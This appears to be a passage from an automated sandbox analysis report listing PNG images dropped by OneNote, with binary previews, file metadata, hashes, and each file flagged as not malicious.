                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
